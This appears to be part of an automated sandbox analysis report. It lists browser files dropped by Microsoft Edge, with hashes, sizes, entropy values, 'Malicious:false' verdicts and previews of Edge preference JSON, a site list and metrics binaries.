                                                                                                                                                                                    SSDEEP:192:fsNA8BKeiRUpxbQQFkCa6qRAq1k8SPxVLZ7VTiQ:fsNA/EsQWCa6q3QxVNZTiQ
                                                                                                                                                                                    MD5:2A5C17C24236708FC78B50FCAA5DA02F
                                                                                                                                                                                    SHA1:00CC58F6BC2A2F3643A13D88AA59D8E6F21F1CD1
                                                                                                                                                                                    SHA-256:704ED83892EB2D6893624D045E2E2D55ABEFEE95AE53DE0645B9245D59696C80
                                                                                                                                                                                    SHA-512:B07369CCA5564DF0395AAD2A230381CD5CDBE3E2CB2D094B71411C760347DBF19F30503581FDD4D72DDEE747EEF3B2A1FA4B97B4ED0D853F3E3C06A2208A7889
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Ve
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):8317
                                                                                                                                                                                    Entropy (8bit):5.796000980006556
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:fsNw8BKeiRUpmbQQFkCa6qRAq1k8SPxVLZ7VTiQ:fsNw/BsQWCa6q3QxVNZTiQ
                                                                                                                                                                                    MD5:E629F170D8E47CACCA839FE30E6A66E6
                                                                                                                                                                                    SHA1:926F27900D7B17BCC2B5BDD4CFF89276084D1D5C
                                                                                                                                                                                    SHA-256:D57F52E6C5FE519D98C52F3227EC4F5519E069A7E329E9B6D5C134771AC38F15
                                                                                                                                                                                    SHA-512:C31E110828561EDFB77F0DCF86E75B239CA393D9AF728624D9F5DAE44483A85C756CCCC3C2204FDDEE074047092EB28D35319190C39FA978E057D7B25257B6D7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fire_local_softlanding_notification":false,"fre":{"oem_bookmarks_set":true,"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):6820
                                                                                                                                                                                    Entropy (8bit):5.790644179820606
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:ak8BoeiRUpthQc6qRAq1k8SPxVLZ7VTiq:akJCQc6q3QxVNZTiq
                                                                                                                                                                                    MD5:E344CDFEFE09EF8F1A30F6A15B2BBDF1
                                                                                                                                                                                    SHA1:49B0A723665484DCE70126E81C073D1B301EE82A
                                                                                                                                                                                    SHA-256:929397D69A9597CF197A406975128B990D6EB65C79C56B910A896F90F684848B
                                                                                                                                                                                    SHA-512:C27FD5D2C539F30127F0291337C08EAE37EF210BDC8906FCDBAD50B54C5BB7B119BE82BF5CCD7B8817E86EF32B771E8463EAC7F69D1F27AC8882F526789D25EE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAC8CK533tb6QaejX7o75gqCEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADBOi7+y60hQFGCDCz0FBh1Y7fVnmacANSYaXNgsyAQbgAAAAA
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):23907
                                                                                                                                                                                    Entropy (8bit):6.048100436988889
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:7tMkaMJH2m8qVT8IeQ0I5t0b9MEFdsNwhvkJ5ZCRfT35ub/Y3jFd4J:xMkbJrT8IeQc5d1mJ5ZCRfL5uTY3JS
                                                                                                                                                                                    MD5:919FEA06D0C8F5A4F0FC0A5AEE5FA74D
                                                                                                                                                                                    SHA1:E6597DD4B05CBB68C4C05AED5DCFE61873805250
                                                                                                                                                                                    SHA-256:218842AC9F3D42A31E8D45128FCB39617C35B3B79BBA5C8BB445908030154A0B
                                                                                                                                                                                    SHA-512:2990931B6EB69FE06FBE4C3D35C879B7A169C30BAF906C6D8ABC238A99B9753572DE9AA40889356936EE6E9728A88B06EBFE73BFFF39B96DD7490CF9849E8C9A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380906602124790","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1736433006"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5G
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):107893
                                                                                                                                                                                    Entropy (8bit):4.640159940159965
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P70:fwUQC5VwBIiElEd2K57P70
                                                                                                                                                                                    MD5:9B9EEAFEA0BB753A8FAEB453AB956772
                                                                                                                                                                                    SHA1:4F886474C956DB363B327F13F3E65B53807DB52A
                                                                                                                                                                                    SHA-256:F8ADE4E5D3BCFEC0035529AC7AEA621E1FB3CEF0DAC19E62521BA8433AC9A894
                                                                                                                                                                                    SHA-512:F3E66357046E24C3CB5D11A9E7FC7BA60393C00878D0C01DF87CEA10DCAE0F93CBBC8522C8FD92F58622E17EF2481FAECA509010FE842577016E4B201C836930
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):107893
                                                                                                                                                                                    Entropy (8bit):4.640159940159965
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P70:fwUQC5VwBIiElEd2K57P70
                                                                                                                                                                                    MD5:9B9EEAFEA0BB753A8FAEB453AB956772
                                                                                                                                                                                    SHA1:4F886474C956DB363B327F13F3E65B53807DB52A
                                                                                                                                                                                    SHA-256:F8ADE4E5D3BCFEC0035529AC7AEA621E1FB3CEF0DAC19E62521BA8433AC9A894
                                                                                                                                                                                    SHA-512:F3E66357046E24C3CB5D11A9E7FC7BA60393C00878D0C01DF87CEA10DCAE0F93CBBC8522C8FD92F58622E17EF2481FAECA509010FE842577016E4B201C836930
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                    Entropy (8bit):0.4455318660684781
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:hYt/iP8bLDFNaHpuOBsraf/71OHzqs2aHJ:JQDFMXCN
                                                                                                                                                                                    MD5:9AEC09016934FAD89094B4D3CEF8D9C8
                                                                                                                                                                                    SHA1:327EE85F71D1D164E62C394A95235046E88B31CB
                                                                                                                                                                                    SHA-256:867B1379B45ECA8FA6A4719F89EB8CF6D70CA451926EBE486229AD74D3AAAD09
                                                                                                                                                                                    SHA-512:1E78DCC8D7D9147B768EE06F91DD52B506A9A61ED3493CD2844AD90AC859083F12723E63579B1D2B4E63968887B7563EFF412BC62C29879135E4013973243684
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:...@..@...@.....C.].....@................_..H_..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....e.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".arekji20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U.>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z............<..8...#...msNurturingAssistanceHomeDependency.....triggered....(..$.......
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                    Entropy (8bit):0.04076933915200717
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:/V0EbtmqvDtKX7HJEa3XxxTxqZ/g+X/U970R6Eqhq7NsnRr1gQMJMn0n8y08TcmQ:d0Et8eK8Yg2Fh88xgFM008T2RGOD
                                                                                                                                                                                    MD5:5E50EE3D98480EADE8B76B9B1427D7C7
                                                                                                                                                                                    SHA1:9CB814C566592DE1668A2425ED202804F8B010B8
                                                                                                                                                                                    SHA-256:6526D1971AD13AEEC5CF9F9B74E56AC7D6C727A25AD6645BA11703EC61B5A0B6
                                                                                                                                                                                    SHA-512:D7DF91D53DC2C67CBF58A85251F56FC9C9AA13AD957183D701FA3165A289B7C6115D5CDA4ECC5403ECDB57D310D31D759E2FCCCF5D51A37122BB49D94D4548CD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:...@..@...@.....C.].....@................b...Q..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....}.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".arekji20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J...I.r.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...............................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                    Entropy (8bit):0.03953148718265371
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:RR0EbtmqvDKKXGJLMo4sPqpRX/gg4rfh9rNE1emj1gQtLIy1Tn8y08Tcm2RGOdB:b0Et64osfmhFSZg4IU08T2RGOD
                                                                                                                                                                                    MD5:7FAFBEB7483D0733A29D0441BBEA2189
                                                                                                                                                                                    SHA1:9341CE11D24565FAF0162E8416CC5278CF240CD0
                                                                                                                                                                                    SHA-256:F279B0C780466309AB09CDF13405440A3031707DC01A9319355195D996FA9526
                                                                                                                                                                                    SHA-512:F2D088CF7E7E11DAE88DEC492B9D24274B703A433976959071CBD82C2508F313B4BD29F950965D34E93002290DA91C009356512C97B9576076A251543A602C11
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:...@..@...@.....C.].....@...............x_..0O..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".arekji20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):16384
                                                                                                                                                                                    Entropy (8bit):0.3553968406659012
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:biUXhV0xosU8xCe+JKlkQuMRxCb8ZXfgYJ0IJpP0KLsyW1L7Fx6:bFRqxosU8xWMk8xVZ4YWI30otWn
                                                                                                                                                                                    MD5:CFAB81B800EDABACBF6CB61AA78D5258
                                                                                                                                                                                    SHA1:2730D4DA1BE7238D701DC84EB708A064B8D1CF27
                                                                                                                                                                                    SHA-256:452A5479B9A2E03612576C30D30E6F51F51274CD30EF576EA1E71D20C657376F
                                                                                                                                                                                    SHA-512:EC188B0EE4D3DAABC26799B34EE471BEE988BDD7CEB011ED7DF3D4CF26F98932BBBB4B70DC2B7FD4DF9A3981B3CE22F4B5BE4A0DB97514D526E521575EFB2EC6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:...@.@...@..............@...................................`... ...i.y.........CrashpadMetrics.....i.y..Yd.h.......A.......e............,.........W.......................W....................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.UsedPct.......h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e...........i.y..Yd.........A............................E.[4.f..................E.[4.f.................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.Errors............i.y..Yd.........A..................._..-`....h-.....................h-....................Crashpad.HandlerLifetimeMilestone.......0...i.y.[".........................................i.y..Yd.@.......C...........................VM....],................WM....],................Stability.BrowserExitCodes...... ...i.y......VM....],........H...i.y.1U!S............................................................ ...i.y...0...WM....],........................................
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):280
                                                                                                                                                                                    Entropy (8bit):3.053837919135487
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:FiWWltl/9UgBVP/Sh/JzvLi2RRIxINXj1Qllt:o1//BVsJDG2Yqc/
                                                                                                                                                                                    MD5:2DE758B44E33AEAF19BAF23B60AA10AD
                                                                                                                                                                                    SHA1:CC987BEF7CAFDF20BC38906BA55767454B029A6A
                                                                                                                                                                                    SHA-256:6E8D74D84A400AD5C68229CF1458EA52EE75018E74070152DA8A189853FBF2C6
                                                                                                                                                                                    SHA-512:6BFC85466FC55782132F38EB3F851FA80434494A2A1607862607065608CE11C2CFA2533C218165F869BC41B5790C6E58F8A8FBCFBFCF59623C3B90436AFD37D0
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:sdPC......................5.y&.K.?....................................................................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................48ea0ba2-e9bb-4568-92cb-0f42a5c5d505............
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):12454
                                                                                                                                                                                    Entropy (8bit):5.074987217984796
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:sVgJ9pQTryZiuaba4uylJFjaYWs8/pj+FDlQAy4b1f:sVgLAJu6JFjgpUJQbI
                                                                                                                                                                                    MD5:A044EDA312E06B101E64AB0DCAB634C3
                                                                                                                                                                                    SHA1:6A0234D0A07B23BD1C910C3D628B82B0E7AA2DC1
                                                                                                                                                                                    SHA-256:C82540242E3786134FB78038C53A44F40B9B995C4AB4B0B9CEE031CF5E171A71
                                                                                                                                                                                    SHA-512:78DA8258245F34A6301D6406DF273BD92610674DB80D82FE82F6A11EE76866DC405ED3037F4E6A8DD1C11AD3CBDEC8F9AB9C24505E93866B268AD37D09AA5AD2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380906601968903","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):39660
                                                                                                                                                                                    Entropy (8bit):5.562005098687016
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:zmjOpW7pLGLhv5WPkSfwg8F1+UoAYDCx9Tuqh0VfUC9xbog/OV7GGV10Prwd1u9i:zmjOp2chv5WPkSfwgu1jaOGGb08d1u9i
                                                                                                                                                                                    MD5:2CB86932158AE99C8836A4EC6480C9BE
                                                                                                                                                                                    SHA1:C78BB7D2D694FC7C4068CD48BABCD50F1826DE49
                                                                                                                                                                                    SHA-256:901FAE22BFB08FF8CD38FFD93089C2E8746FD6805F840A11AEC7A3D76AD65F65
                                                                                                                                                                                    SHA-512:967D401352E69FD45C0F227C394F22706CAFCCE4EEF25AF9227F54AA399E6770D4B2403BDE7D4EA0A4F68CD84A7E5CEAF133B8D179B2D8A69E9322587A7D57AB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380906601312016","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380906601312016","location":5,"ma
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):13692
                                                                                                                                                                                    Entropy (8bit):5.2366102447314065
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:sVgJ9pQTryZiuaba4uylJFjgjqvcREb1gYWs8/pj+FDlQAp4b1f:sVgLAJu6JFjSqEAgpUJQAI
                                                                                                                                                                                    MD5:6D58ED48C7EE85F4E6517EBAFEA21810
                                                                                                                                                                                    SHA1:64E4C2B31226613888505E3778876A1C1A003928
                                                                                                                                                                                    SHA-256:5875FDEB09A19AC9AD4AB07DE10D343F85EF7E9E1D2DA32E7C4619CB59C0B8F1
                                                                                                                                                                                    SHA-512:3BF9067DDB18C2EF73AED402D9579A3E4CDD1EBED00F56D7A060CACD892F388DD12310AB9967BCCFDFC01811F7AC63781EB1E2B881DB01AE00D69434D301FDDD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380906601968903","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):37817
                                                                                                                                                                                    Entropy (8bit):5.555724382843898
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:zmjOpW7pLGLhv5WPkSfwg8F1+UoAYDCx9Tuqh0VfUC9xbog/OVuV10Prwd1uIrDo:zmjOp2chv5WPkSfwgu1javb08d1uIFlo
                                                                                                                                                                                    MD5:2B168CC3B285A7699213D12105C159E5
                                                                                                                                                                                    SHA1:D9DE66A6E1E446401270DC1C77E9D41BB4DB1B08
                                                                                                                                                                                    SHA-256:12D144BB4CEBCF3AD2601BAE9F9B11E6B3DD625335980447CAC247C25D0EB839
                                                                                                                                                                                    SHA-512:C3F9A441F4A610C12645F0053DE41EAF8EFF3D056BFC3D000B1807F7D917705B5D86E57A5A12D47AE171817DD6594FCF3D760C4128FF6D0849590DF7DAE03237
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
